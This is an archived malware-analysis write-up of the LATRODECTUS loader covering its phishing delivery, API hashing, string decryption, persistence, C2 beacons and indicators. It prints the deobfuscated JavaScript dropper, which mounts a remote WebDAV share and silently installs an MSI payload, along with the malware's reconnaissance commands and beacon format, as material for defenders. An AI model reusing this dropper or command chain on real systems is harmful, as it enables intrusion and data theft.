{
	"id": "00d533c8-978e-478b-b079-9da09cf6ad4e",
	"created_at": "2026-04-06T00:16:14.390606Z",
	"updated_at": "2026-04-10T03:20:17.183941Z",
	"deleted_at": null,
	"sha1_hash": "353bbdeb7e7ec29b59254235d83a1b8bb57f8960",
	"title": "Inside LATRODECTUS: A Dive into Malware Tactics and Mitigation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1424298,
	"plain_text": "Inside LATRODECTUS: A Dive into Malware Tactics and\r\nMitigation\r\nBy Zyad Waleed Elzyat\r\nPublished: 2024-06-13 · Archived: 2026-04-05 14:25:14 UTC\r\nSummary\r\nLATRODECTUS is a sophisticated malware variant designed to replace the functionality of ICEDID and\r\nalso download it but in this report we will analyze LATRODECTUS only.\r\nLATRODECTUS spreads through phishing emails and malicious attachments. Once executed, it copies\r\nitself into the AppData directory and creates a scheduled task named “Updater” to ensure persistence upon\r\nsystem logon\r\nLATRODECTUS capabilities:\r\nCommand Execution: It can execute various commands received from the C2 server, such as downloading\r\nand running executable files, DLLs.\r\nInformation Gathering: The malware collects comprehensive system information, including IP\r\nconfiguration, system info, domain trusts, network views, and details about antivirus products.\r\nPersistence : The malware establishes persistence by modifying system registries, creating scheduled tasks\r\nfor startup.\r\nLATRODECTUS Delivery\r\n1. The initial stage of the LATRODECTUS infection typically begins with a phishing email.\r\n2. When the victim opens the malicious attachment or clicks on the link, a JavaScript dropper is executed.\r\n3. The JS dropper uses WMI to execute commands and scripts within the Windows environment. WMI allows the\r\nmalware to perform various administrative tasks without raising suspicion.\r\n4. then downloads a malicious MSI (Microsoft Installer) file from a remote server. This MSI file contains the next\r\nstage of the malware\r\n5. After downloading the MSI file, the malware extracts a DLL (Dynamic Link Library) file from it. The DLL is\r\nthen executed using the rundll32 command\r\n6. 
Once the LATRODECTUS DLL is running, it communicates with a Command and Control (C2) server.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 1 of 17\n\ndef de_Comment(input_file, output_file):\r\n with open(input_file, 'r') as infile, open(output_file, 'w') as outfile:\r\n for line in infile:\r\n if line.startswith('////'):\r\n outfile.write(line[4:])\r\noutput_file = 'out.js'\r\nde_Comment(input_file, output_file)\r\nAfter running the Python script to de-obfuscate the JavaScript file, the code has been transformed into a\r\nmore readable and understandable format. This process unveils the original structure and logic of the code,\r\nmaking it easier to analyze\r\nvar network = new ActiveXObject(\"WScript.Network\");\r\nvar wmi = GetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2\");\r\nvar attempt = 0;\r\nvar connected = false;\r\nvar driveLetter, letter;\r\nfunction isDriveMapped(letter) {\r\n var drives = network.EnumNetworkDrives();\r\n for (var i = 0; i \u003c drives.length; i += 2) {\r\n if (drives.Item(i) === letter) {\r\n return true;\r\n }\r\n }\r\n return false;\r\n}\r\nfor (driveLetter = 90; driveLetter \u003e= 65 \u0026\u0026 !connected; driveLetter--) {\r\n letter = String.fromCharCode(driveLetter) + \":\";\r\n if (!isDriveMapped(letter)) {\r\n try {\r\n network.MapNetworkDrive(letter, \"\\\\\\\\95.164.3.171@80\\\\share\\\\\");\r\n connected = true;\r\n break;\r\n } catch (e) {\r\n attempt++;\r\n }\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 2 of 17\n\n}\r\n}\r\nif (!connected \u0026\u0026 attempt \u003e 5) {\r\n var command = 'net use ' + letter + ' \\\\\\\\95.164.3.171@80\\\\share\\\\ /persistent:no';\r\n wmi.Get(\"Win32_Process\").Create(command, null, null, null);\r\n var startTime = new Date();\r\n while (new Date() - startTime \u003c 3000) {}\r\n connected 
= isDriveMapped(letter);\r\n}\r\nif (connected) {\r\n var installCommand = 'msiexec.exe /i \\\\\\\\95.164.3.171@80\\\\share\\\\cisa.msi /qn';\r\n wmi.Get(\"Win32_Process\").Create(installCommand, null, null, null);\r\n try {\r\n network.RemoveNetworkDrive(letter, true, true);\r\n } catch (e) {\r\n }\r\n} else {\r\n WScript.Echo(\"Failed.\");\r\n}\r\nUnpcaking\r\nUpon encountering malware embedded within an MSI file, I employed “UniExtract” to extract the DLL\r\nfile concealed within.\r\nPress enter or click to view image in full size\r\nTo expedite the unpacking process, I’ve opted to utilize [unpackme](https://www.unpac.me/), a service\r\nspecifically designed for efficiently unpacking malwares and now the sample is ready for analysis.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 3 of 17\n\nAPI Hashing\r\nThe LATRODECTUS DLL contains four export functions. These exports are essentially entry points that\r\ncan be called by other programs or system processes. Despite having multiple names, all four exports direct\r\nexecution to the same underlying function within the DLL.\r\nPress enter or click to view image in full size\r\nand when go into that function i found this function and inside it there are 6 functions contains alot of\r\nhashes that malware use it for API Hashing and try to resolve it with hashdb\r\nhttps://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea\r\nPage 4 of 17\n\nLATRODECTUS Use CR32 For API Hashing to resolve kernel32.dll and ntdll.dll modules and their\r\nfunctions. 
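The CRC32 lookup that HashDB provides can be rebuilt locally. The following Python is an added example for this section, not code from the article, from the malware or from HashDB: it hashes a constructed list of kernel32.dll and ntdll.dll export names with plain CRC32 (the zlib polynomial over the ASCII name, no seed, no case folding) and then scans a constructed fragment of code bytes for 32-bit immediates that match the table, which is what a resolver does when it walks the six hash-filled functions. The exact CRC32 variant used by a given sample is an assumption here; verify it against one hash already resolved by HashDB before trusting the table, because a seeded or case-folded variant produces different values, and the export lists and code bytes are constructed, not the real tables or sample.

```python
import zlib

# Constructed export lists (a handful of names, not the real export tables).
CONSTRUCTED_EXPORTS = {
    'kernel32.dll': ['LoadLibraryA', 'GetProcAddress', 'VirtualAlloc',
                     'CreateFileW', 'GetTempPathW', 'WriteFile'],
    'ntdll.dll': ['NtAllocateVirtualMemory', 'RtlGetVersion', 'NtClose'],
}


def crc32_api_hash(name: str) -> int:
    # Plain CRC32 over the ASCII export name; assumed variant (no seed, no
    # case folding). Check one known pair against HashDB before relying on it.
    return zlib.crc32(name.encode('ascii')) & 0xFFFFFFFF


def build_hash_table(exports_by_module: dict) -> dict:
    # hash -> list of (module, export). CRC32 is not collision free, so every
    # candidate for a hash is kept instead of silently overwriting the first.
    table = {}
    for module, exports in exports_by_module.items():
        for export in exports:
            table.setdefault(crc32_api_hash(export), []).append((module, export))
    return table


def resolve_hashes(hashes, table: dict) -> list:
    # Unresolved hashes stay in the output with an empty candidate list, so a
    # gap in the export list is visible instead of disappearing.
    return [(h, table.get(h, [])) for h in hashes]


def scan_immediates(code: bytes, table: dict) -> list:
    # Every 4-byte window is a potential imm32 operand (x86 immediates are not
    # aligned). Returns (offset, value, candidates) for each window that hits;
    # on real code expect a few chance hits and confirm them in the disassembly.
    hits = []
    for off in range(len(code) - 3):
        value = int.from_bytes(code[off:off + 4], 'little')
        if value in table:
            hits.append((off, value, table[value]))
    return hits


def constructed_code() -> bytes:
    # Constructed stand-in for a hashing-routine fragment: two `mov eax, imm32`
    # instructions (opcode B8) carrying API hashes, padded with NOPs and a ret.
    return (bytes([0x90, 0xB8]) + crc32_api_hash('VirtualAlloc').to_bytes(4, 'little')
            + bytes([0x90, 0x90, 0xB8]) + crc32_api_hash('NtClose').to_bytes(4, 'little')
            + bytes([0xC3]))


if __name__ == '__main__':
    table = build_hash_table(CONSTRUCTED_EXPORTS)
    for off, value, candidates in scan_immediates(constructed_code(), table):
        print(f'offset {off:#x}: {value:#010x} -> {candidates}')
```

To use this on a real sample, replace CONSTRUCTED_EXPORTS with the export names read from the system DLLs (pefile can enumerate them) and feed the bytes of the hash-filled functions to scan_immediates; the candidate lists then become the comments to apply at each hash.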
To resolve additional libraries such as user32.dll or wininet.dll, it enumerates every .dll file in the system directory (the \\*.dll string below).\r\nString Decryption\r\nI used the [0x0d4y](https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/) script to decrypt the encrypted strings in the sample. After changing it to write its output to a text file, I ran it to obtain the decrypted strings for further examination. Each encrypted string is stored as a blob whose first byte is the initial XOR key, whose fifth byte XORed with that key gives the length, and whose data starts at offset 6; the key is incremented before every byte.\r\nimport pefile\r\nimport re\r\n\r\npe = pefile.PE('latrodectus_unpacked.dll')  # the unpacked DLL (assumed file name)\r\n\r\ndef format_string(encoded_string: bytes) -\u003e str:\r\n    try:\r\n        formatted_string = encoded_string.decode('utf-8')\r\n        if formatted_string.isascii():\r\n            return formatted_string\r\n    except UnicodeDecodeError:\r\n        pass\r\n    return \"Not an ASCII String\"\r\n\r\ndef decrypt_string(data_enc: bytes, xor_key: int) -\u003e str:\r\n    # the key is incremented before every byte and only its low byte is used\r\n    decrypted_strings = bytearray()\r\n    for enc_data in data_enc:\r\n        xor_key += 1\r\n        decrypted_strings.append(enc_data ^ (xor_key \u0026 0xFF))\r\n    return format_string(decrypted_strings)\r\n\r\n# The script assumes every blob starts with the same key byte as the first blob\r\n# in .data and searches the section for every occurrence of that byte value.\r\ndata_section = next((s for s in pe.sections if b'.data' in s.Name), None)\r\ndata = data_section.get_data()\r\nfirst_data_byte = data[0]\r\nreferences = []\r\nfor section in pe.sections:\r\n    if b'.data' in section.Name:\r\n        data = section.get_data()\r\n        index = data.find(first_data_byte)\r\n        while index != -1:\r\n            references.append(section.VirtualAddress + index)\r\n            index = data.find(first_data_byte, index + 1)\r\noutput_file = \"output.txt\"\r\nwith open(output_file, \"w\") as f:\r\n    for ref in references:\r\n        encryption_key = pe.get_data(ref, 1)[0]\r\n        f.write(\"\\033[33m\\nXOR Initial Key: \\033[0m\" + hex(encryption_key) + \"\\n\")\r\n        data_length = encryption_key ^ pe.get_data(ref + 4, 1)[0]\r\n        f.write(\"\\033[34mEncrypted Data Block Length: \\033[0m\" + str(data_length) + \"\\n\")\r\n        encrypted_data = pe.get_data(ref, data_length + 6)[6:]\r\n        f.write(\"\\033[31mEncrypted Data Block: \\033[0m\" + hex(int.from_bytes(encrypted_data, byteorder='big')) + \"\\n\")\r\n        decrypted_str = decrypt_string(encrypted_data, encryption_key)\r\n        f.write(\"\\033[32mDecrypted String:\\033[0m\" + decrypted_str + \"\\n\")\r\nwith open(output_file, \"r\") as f:\r\n    output_text = f.read()\r\npattern = r\".*Decrypted String:.*\"\r\nresult = re.findall(pattern, output_text)\r\ncleaned_output_file = \"cleaned_output.txt\"\r\nwith open(cleaned_output_file, \"w\") as f:\r\n    for line in result:\r\n        f.write(line + \"\\n\")\r\nprint(\"Decrypted String saved to:\", cleaned_output_file)\r\nThe cleaned output, as the script printed it:\r\nDecrypted String:/c ipconfig /all\r\nDecrypted String:C:\\Windows\\System32\\cmd[.]exe\r\nDecrypted String:/c systeminfo\r\nDecrypted String:/c nltest /domain_trusts\r\nDecrypted String:/c net view /all /domain\r\nDecrypted String:/c nltest /domain_trusts /all_trusts\r\nDecrypted String:/c net view /all\r\nDecrypted String:\u0026ipconfig=\r\nDecrypted String:/c net group \"Domain Admins\" /domain\r\nDecrypted String:/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Forma\r\nDecrypted String:C:\\Windows\\System32\\wbem\\wmic.exe\r\nDecrypted String:/c net config workstation\r\nDecrypted String:/c wmic.exe /node:localhost /names\r\nDecrypted String:R6[2M\u003eB2Z\r\nDecrypted String:/c whoami /groups\r\nDecrypted String:\u0026systeminfo=\r\nDecrypted String:\u0026domain_trusts=\r\nDecrypted String:\u0026domain_trusts_all=\r\nDecrypted String:\u0026net_view_all_domain=\r\nDecrypted String:\u0026net_view_all=\r\nDecrypted String:\u0026net_group=\r\nDecrypted 
String:\u0026wmic=\r\nDecrypted String:\u0026net_config_ws=\r\nDecrypted String:\u0026net_wmic_av=\r\nDecrypted String:\u0026whoami_group=\r\nDecrypted String:{\r\nDecrypted String:\"pid\":\r\nDecrypted String:\"%d\",\r\nDecrypted String: \"proc\":\r\nDecrypted String:\"%s\",\r\nDecrypted String: \"subproc\": [\r\nDecrypted String:]\r\nDecrypted String:}\r\nDecrypted String:\u0026proclist=[\r\nDecrypted String:{\r\nDecrypted String:\"pid\":\r\nDecrypted String:\"%d\",\r\nDecrypted String:\"proc\":\r\nDecrypted String:\"%s\",\r\nDecrypted String:\"subproc\": [\r\nDecrypted String:]\r\nDecrypted String:}\r\nDecrypted String:\u0026desklinks=[\r\nDecrypted String:*.*\r\nDecrypted String:\"%s\"\r\nDecrypted String:]\r\nDecrypted String:Update_%x\r\nDecrypted String:Custom_update\r\nDecrypted String:.dll\r\nDecrypted String:.exe\r\nDecrypted String:Updater\r\nDecrypted String:\"%s\"\r\nDecrypted String:rundll32.exe\r\nDecrypted String:\"%s\", %s %s\r\nDecrypted String:runnung\r\nDecrypted String::wtfbbq\r\nDecrypted String:%d\r\nDecrypted String:files/bp.dat\r\nDecrypted String:%s\\%d.dll\r\nDecrypted String:%d[.]dat\r\nDecrypted String:%s\\%s\r\nDecrypted String:init -zzzz=\"%s\\%s\"\r\nDecrypted String:front\r\nDecrypted String:/files/\r\nDecrypted String:Littlehw\r\nDecrypted String:.exe\r\nDecrypted String: Content-Type application/x-www-form-urlencoded\r\nDecrypted String:POST\r\nDecrypted String:GET\r\nDecrypted String:curl/7.88.1\r\nDecrypted String:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nDecrypted String:CLEARURL\r\nDecrypted String:URLS\r\nDecrypted String:COMMAND\r\nDecrypted String:ERROR\r\nDecrypted String:12345\r\nDecrypted String:counter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direc\r\nDecrypted 
String:\u003c!DOCTYPE\r\nDecrypted String:%s%d.dll\r\nDecrypted String:\u003chtml\u003e\r\nDecrypted String:\u003c!DOCTYPE\r\nDecrypted String:%s%d[.]exe\r\nDecrypted String:LogonTrigger\r\nDecrypted String:%x%x\r\nDecrypted String:TimeTrigger\r\nDecrypted String:PT1H%02dM\r\nDecrypted String:\u0026mac=\r\nDecrypted String:;\r\nDecrypted String:%04d-%02d-%02dT%02d:%02d:%02d\r\nDecrypted String:%02x\r\nDecrypted String::%02x\r\nDecrypted String:PT0S\r\nDecrypted String:\u0026computername=%s\r\nDecrypted String:\u0026domain=%s\r\nDecrypted String:\\*.dll\r\nDecrypted String:ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\nDecrypted String:%04X%04X%04X%04X%08X%04X\r\nDecrypted String:\\Registry\\Machine\\\r\nDecrypted String:AppData\r\nDecrypted String:Desktop\r\nDecrypted String:Startup\r\nDecrypted String:Personal\r\nDecrypted String:Local AppData\r\nDecrypted String:Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\r\nDecrypted String:hxxps[://]aytobusesre[.]com/live/\r\nDecrypted String:hxxps[://]scifimond[.]com/live/\r\nDecrypted String:C:\\WINDOWS\\SYSTEM32\\rundll32[.]exe %s,%s\r\nDecrypted String:C:\\WINDOWS\\SYSTEM32\\rundll32[.]exe %s\r\nDecrypted String:\\update_data.dat\r\nDecrypted String:URLS|%d|%s\r\nI also used the AhmedS Kasmani script, with some modifications, to do the same from inside IDA Pro and annotate each call site of the decryption function with its decrypted string:\r\nimport idaapi, idc, idautils\r\n\r\ndef find_fn_Xrefs(fn_addr):\r\n    xref_list = []\r\n    for ref in idautils.XrefsTo(fn_addr):\r\n        xref = {}\r\n        xref['normal'] = ref.frm\r\n        xref['hex'] = hex(ref.frm)\r\n        xref_list.append(xref)\r\n    return xref_list\r\n\r\ndef get_bytes_from_address(addr, length):\r\n    ea = addr\r\n    ret_data = bytearray()\r\n    for i in range(0, length):\r\n        data = idc.get_bytes(ea + i, 1)\r\n        ret_data.append(data[0])\r\n    return ret_data\r\n\r\ndef get_fastcall_args_number(fn_addr, arg_number):\r\n    # walk backwards from the call site; the n-th mov/lea before it is taken as\r\n    # the instruction that loads the n-th fastcall argument\r\n    args = []\r\n    arg_count = 0\r\n    ptr_addr = fn_addr\r\n    while True:\r\n        ptr_addr = idc.prev_head(ptr_addr)\r\n        if idc.print_insn_mnem(ptr_addr) == 'mov' or idc.print_insn_mnem(ptr_addr) == 'lea':\r\n            arg_count += 1\r\n            if arg_count == arg_number:\r\n                if idc.get_operand_type(ptr_addr, 1) == idc.o_mem:\r\n                    args.append(idc.get_operand_value(ptr_addr, 1))\r\n                elif idc.get_operand_type(ptr_addr, 1) == idc.o_imm:\r\n                    args.append(idc.get_operand_value(ptr_addr, 1))\r\n                elif idc.get_operand_type(ptr_addr, 1) == idc.o_reg:\r\n                    reg_name = idaapi.get_reg_name(idc.get_operand_value(ptr_addr, 1), 4)\r\n                    # get_reg_value is not defined in this excerpt of the script\r\n                    reg_value = get_reg_value(ptr_addr, reg_name)\r\n                    args.append(reg_value)\r\n                else:\r\n                    print(\"Exception in get_stack_args\")\r\n                    return\r\n                return args\r\n        else:\r\n            continue\r\n    return args\r\n\r\ndef decode_str(s) -\u003e str:\r\n    is_wide_str = len(s) \u003e 1 and s[1] == 0\r\n    result_str = \"\"\r\n    if not is_wide_str:\r\n        result_str = s.decode(\"utf8\")\r\n    else:\r\n        result_str = s.decode(\"utf-16le\")\r\n    if result_str.isascii():\r\n        return result_str\r\n    return \"\"\r\n\r\ndef decrypt(a1):\r\n    # same layout as in the 0x0d4y script: a1[0] is the initial key,\r\n    # a1[4] ^ a1[0] the length, and the data starts at offset 6\r\n    result = bytearray()\r\n    key = a1[0]\r\n    result_len = a1[4] ^ a1[0]\r\n    extracted_data = a1[6:6 + result_len]\r\n    for i in range(result_len):\r\n        key = (key + 1) % 256\r\n        # the tail of this debug line was cut off in the extraction and is reconstructed here\r\n        print(f\"Debug: key: {hex(key)}, extracted_data[i] : {hex(extracted_data[i])}, result: {hex(extracted_data[i] ^ key)}\")\r\n        result.append((extracted_data[i] ^ key) % 256)\r\n    print(f\"Debug: {len(result)} | {result}\")\r\n    return decode_str(result)\r\n\r\ndef set_hexrays_comment(address, text):\r\n    print(\"Setting hex rays comment\")\r\n    cfunc = idaapi.decompile(address)\r\n    tl = idaapi.treeloc_t()\r\n    tl.ea = address\r\n    tl.itp = idaapi.ITP_SEMI\r\n    if cfunc:\r\n        
cfunc.set_user_cmt(tl, text)\r\n        cfunc.save_user_cmts()\r\n    else:\r\n        print(\"Decompile failed: {:#x}\".format(address))\r\n\r\ndef set_comment(address, text):\r\n    idc.set_cmt(address, text, 0)\r\n    set_hexrays_comment(address, text)\r\n\r\ndecryption_fn_address = 0x000000018000ACC8\r\nxref_list = find_fn_Xrefs(decryption_fn_address)\r\nfor ref in xref_list:\r\n    print(\"\")\r\n    print(f\"Func Address : {ref['hex']}, {ref['normal']}\")\r\n    arg_address = get_fastcall_args_number(ref['normal'], 1)[0]\r\n    enc_value = get_bytes_from_address(arg_address, 8)\r\n    print(f\"Debug: enc_value[0] : {hex(enc_value[0])}, enc_value[4]: {hex(enc_value[4])}\")\r\n    result_str_len = enc_value[0] ^ enc_value[4]\r\n    print(f\"result char count : {result_str_len}\")\r\n    enc_value = get_bytes_from_address(arg_address, 6 + result_str_len)\r\n    if b'\\xff\\xff\\xff\\xff' not in enc_value:\r\n        print(f\"Debug: len : {len(enc_value)}, enc_value: {enc_value}\")\r\n        dec_string = decrypt(enc_value)\r\n        print(f\"Decrypted String: {dec_string}\")\r\n        set_comment(ref['normal'], dec_string)\r\nCollecting System Information\r\nThe malware runs the following commands to collect system information, enumerate the domain and check for antivirus products (the wmic query reads the SecurityCenter2 namespace):\r\nC:\\Windows\\System32\\cmd.exe /c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe /c systeminfo\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe /c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe /c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe /c net view /all\r\nC:\\Windows\\System32\\cmd.exe /c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\wbem\\wmic.exe /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Forma\r\nC:\\Windows\\System32\\cmd.exe /c net config workstation\r\nC:\\Windows\\System32\\cmd.exe /c wmic.exe /node:localhost /names\r\nC:\\Windows\\System32\\cmd.exe /c whoami /groups\r\nThe decrypted strings also hold a form key for each command (\u0026ipconfig=, \u0026systeminfo=, \u0026domain_trusts=, \u0026net_view_all=, \u0026net_group=, \u0026net_wmic_av=, \u0026whoami_group= and so on), under which the output of each command is sent to the C2.\r\nPersistence\r\nThe malware uses a simple persistence chain:\r\nExecution through rundll32: the DLL is started with rundll32.exe, so the malicious code runs inside a signed Microsoft host process and the process list shows only a legitimate Windows binary.\r\nCopy in the AppData directory: after execution, the malware writes a copy of itself to\r\nC:\\Users\\[Username]\\AppData\\Roaming\\Custom_update\\Update_….dll\r\n(the Custom_update and Update_%x strings above, so the suffix is a hexadecimal value). AppData is a common location for application data, so the copy blends in with legitimate files.\r\nScheduled task for persistent execution: to keep running across reboots, the malware sets up a task scheduler entry. 
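The dropper script and the decrypted command lines give concrete detection content for this chain. The following Python is an added example, not code from the article or from any product: it runs over a few constructed process-creation events and flags a net use of a UNC path with the @80 WebDAV port suffix, msiexec installing an .msi from a UNC path with /qn, rundll32 loading a DLL from under AppData\\Roaming, and a parent process that launches several of the recon commands within a short window. The event fields (pid, ppid, image, cmdline, time), the Update_1a2b.dll file name, the export name entry, the WmiPrvSE.exe pid and the 60-second window are assumptions, not any product's schema or the real sample's values.

```python
from datetime import datetime, timedelta

BS = chr(92)  # one backslash; the Windows paths below are assembled from it so the
              # sample data contains no escape sequences

# Recon commands from the decrypted strings, as lower-cased substrings.
RECON_MARKERS = ('ipconfig /all', 'systeminfo', 'nltest /domain_trusts', 'net view /all',
                 'net group', 'securitycenter2', 'net config workstation', 'whoami /groups')


def is_webdav_mount(cmdline: str) -> bool:
    # net use X: (UNC path whose host carries @80): the @<port> suffix on a UNC
    # host name is the WebDAV redirector syntax the JS dropper relies on.
    c = cmdline.lower()
    return 'net use' in c and (BS + BS) in c and ('@80' + BS) in c


def is_msi_from_unc(cmdline: str) -> bool:
    # msiexec installing an .msi straight from a UNC path, silently (/qn).
    c = cmdline.lower()
    return 'msiexec' in c and ('/i ' + BS + BS) in c and '.msi' in c and '/qn' in c


def is_rundll32_from_appdata(cmdline: str) -> bool:
    # The persistent copy lives under AppData/Roaming and is started by rundll32.
    c = cmdline.lower()
    return 'rundll32' in c and (BS + 'appdata' + BS + 'roaming' + BS) in c and '.dll' in c


def is_recon_command(cmdline: str) -> bool:
    c = cmdline.lower()
    return any(marker in c for marker in RECON_MARKERS)


def recon_bursts(events, window=timedelta(seconds=60), threshold=4):
    # A parent that spawns `threshold` or more recon commands inside `window` is
    # flagged: one shell running systeminfo is normal, the whole battery is not.
    by_parent = {}
    for ev in events:
        if is_recon_command(ev['cmdline']):
            by_parent.setdefault(ev['ppid'], []).append(ev['time'])
    flagged = []
    for ppid, times in by_parent.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged.append(ppid)
                break
    return flagged


def detect(events) -> list:
    alerts = []
    for ev in events:
        if is_webdav_mount(ev['cmdline']):
            alerts.append(('webdav_mount', ev['pid']))
        if is_msi_from_unc(ev['cmdline']):
            alerts.append(('msi_from_unc', ev['pid']))
        if is_rundll32_from_appdata(ev['cmdline']):
            alerts.append(('rundll32_appdata_dll', ev['pid']))
    for ppid in recon_bursts(events):
        alerts.append(('recon_burst', ppid))
    return alerts


def constructed_events() -> list:
    # Constructed telemetry modelled on the command lines in the article; the
    # pids, timestamps, DLL name and export name are made up.
    share = BS + BS + '95.164.3.171@80' + BS + 'share' + BS
    sys32 = 'C:' + BS + 'Windows' + BS + 'System32' + BS
    cmd = sys32 + 'cmd.exe /c '
    dll = ('C:' + BS + 'Users' + BS + 'user' + BS + 'AppData' + BS + 'Roaming' + BS
           + 'Custom_update' + BS + 'Update_1a2b.dll')
    t0 = datetime(2024, 6, 13, 10, 0, 0)

    def ev(pid, ppid, image, cmdline, seconds):
        return {'pid': pid, 'ppid': ppid, 'image': image, 'cmdline': cmdline,
                'time': t0 + timedelta(seconds=seconds)}

    return [
        ev(100, 1, 'wscript.exe', 'wscript.exe dropper.js', 0),
        # spawned through WMI, so the parent is WmiPrvSE.exe (pid 50), not wscript.exe
        ev(200, 50, 'net.exe', 'net use Z: ' + share + ' /persistent:no', 1),
        ev(201, 50, 'msiexec.exe', 'msiexec.exe /i ' + share + 'cisa.msi /qn', 5),
        ev(300, 2, 'rundll32.exe', 'rundll32.exe \"' + dll + '\", entry', 30),
        ev(301, 300, 'cmd.exe', cmd + 'ipconfig /all', 31),
        ev(302, 300, 'cmd.exe', cmd + 'systeminfo', 32),
        ev(303, 300, 'cmd.exe', cmd + 'nltest /domain_trusts', 33),
        ev(304, 300, 'cmd.exe', cmd + 'net view /all /domain', 34),
        ev(305, 300, 'wmic.exe', sys32 + 'wbem' + BS + 'wmic.exe /Node:localhost /Namespace:'
           + BS + BS + 'root' + BS + 'SecurityCenter2 Path AntiVirusProduct Get', 35),
        ev(306, 300, 'cmd.exe', cmd + 'whoami /groups', 36),
        # a lone systeminfo from an admin shell an hour later: not a burst
        ev(900, 800, 'cmd.exe', cmd + 'systeminfo', 3600),
    ]


if __name__ == '__main__':
    for alert in detect(constructed_events()):
        print(alert)
```

On real telemetry, pair the rundll32 rule with the parent image (a scheduled task runs it under svchost.exe, the Schedule service host) and the WebDAV rule with WebClient service starts, since both legitimate admin use and this chain produce the individual events; the combination within minutes is what separates them.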
This entry, named Updater (one of the decrypted strings), runs the copied DLL through rundll32 at every user logon, so the malware keeps running after restarts. The LogonTrigger, TimeTrigger, PT1H%02dM and PT0S strings are Task Scheduler XML element names and ISO 8601 durations, which suggests the task is registered from an XML definition with a logon trigger and a repeating time trigger.\r\nC2 Extraction\r\nFirst beacon (POST body and headers):\r\ncounter=0\u0026type=1\u0026guid=249507485CA29F24F77B0F43D7BA\u0026os=6\u0026arch=1\u0026username=user\u0026group=510584660\u0026ver=1.1\u0026\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nThe User-Agent is a usable network indicator on its own: the Tob 1.1 token does not belong to any real browser.\r\nFirst Domain : hxxps[://]aytobusesre[.]com\r\nSecond Domain : hxxps[://]scifimond[.]com\r\nBeacon fields:\r\nusername : infected user\r\ndirection : C2 domain\r\nmac : MAC address\r\ncomputername : host name\r\nos : Windows version\r\narch : machine architecture\r\nIOC’s\r\n1. JS SHA-256: 4ff60df7d165862e652f73752eb98cf92202a2d748b055ff1f99d4172fa4c92f\r\n2. MSI SHA-256: 3a950d7e6736f17c3df90844c76d934dc66c17ec76841a4ad58de07af7955f0f\r\n3. Packed DLL SHA-256: aee22a35cbdac3f16c3ed742c0b1bfe9739a13469cf43b36fb2c63565111028c\r\n4. First Domain: hxxps[://]aytobusesre[.]com\r\n5. Second Domain: hxxps[://]scifimond[.]com\r\n6. 
IP’s :\r\n104.21.78.238\r\n172.67.138.110\r\n188.114.96.9\r\n188.114.97.9\r\n188.114.96.0\r\n188.114.97.0\r\n104.21.23.12\r\n172.67.208.70\r\n188.114.97.7\r\n188.114.96.7\r\nNote: these addresses fall in Cloudflare ranges (104.21.0.0/16, 172.67.0.0/16, 188.114.96.0/20), so they are the proxy in front of the two domains rather than the operators' own servers; block and hunt on the domains and the User-Agent, not on these IPs alone.\r\nReferences\r\n[Elastic Report](https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus)\r\n[0x0d4y Python Script](https://0x0d4y.blog/case-study-analyzing-and-implementing-string-decryption-algorithms-latrodectus/)\r\n[AhmedS Kasmani Latrodectus — Malware Analysis Part 1](https://www.youtube.com/watch?v=Ji89-Urr4I0\u0026t=1s)\r\n[AhmedS Kasmani Latrodectus — Malware Analysis Part 2](https://www.youtube.com/watch?v=yUYxVypfvUM\u0026t=1123s)\r\nSource: https://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/@zyadlzyatsoc/inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea"
	],
	"report_names": [
		"inside-latrodectus-a-dive-into-malware-tactics-and-mitigation-5629cdb109ea"
	],
	"threat_actors": [],
	"ts_created_at": 1775434574,
	"ts_updated_at": 1775791217,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/353bbdeb7e7ec29b59254235d83a1b8bb57f8960.pdf",
		"text": "https://archive.orkl.eu/353bbdeb7e7ec29b59254235d83a1b8bb57f8960.txt",
		"img": "https://archive.orkl.eu/353bbdeb7e7ec29b59254235d83a1b8bb57f8960.jpg"
	}
}